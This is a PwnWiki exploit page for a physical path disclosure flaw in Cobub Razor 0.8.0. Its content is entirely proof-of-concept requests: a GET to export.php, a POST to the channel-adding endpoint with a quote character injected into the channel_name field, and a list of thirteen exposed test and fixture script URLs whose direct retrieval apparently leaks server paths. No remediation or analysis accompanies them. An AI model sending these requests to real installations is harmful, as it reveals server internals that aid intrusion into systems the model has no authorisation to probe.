Cobub Razor 0.8.0 物理路徑洩露漏洞

From PwnWiki
Revision as of 13:52, 20 April 2021 by Pwnwiki (talk | contribs) (Created page with "==POC1== <pre> URL: http://localhost/export.php HTTP Method: GET URL: http://localhost/index.php?/manage/channel/addchannel HTTP Method: POST Data: channel_name=test"&platform...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC1

URL: http://localhost/export.php
HTTP Method: GET
URL: http://localhost/index.php?/manage/channel/addchannel
HTTP Method: POST
Data: channel_name=test"&platform=1

POC2

HTTP Method: GET
http://localhost/tests/generate.php
http://localhost/tests/controllers/getConfigTest.php
http://localhost/tests/controllers/getUpdateTest.php
http://localhost/tests/controllers/postclientdataTest.php
http://localhost/tests/controllers/posterrorTest.php
http://localhost/tests/controllers/posteventTest.php
http://localhost/tests/controllers/posttagTest.php
http://localhost/tests/controllers/postusinglogTest.php
http://localhost/tests/fixtures/Controller_fixt.php
http://localhost/tests/fixtures/Controller_fixt2.php
http://localhost/tests/fixtures/view_fixt2.php
http://localhost/tests/libs/ipTest.php
http://localhost/tests/models/commonDbfix.php
Retrieved from "https://pwnwiki.com/index.php?title=Cobub_Razor_0.8.0_物理路徑洩露漏洞&oldid=1765"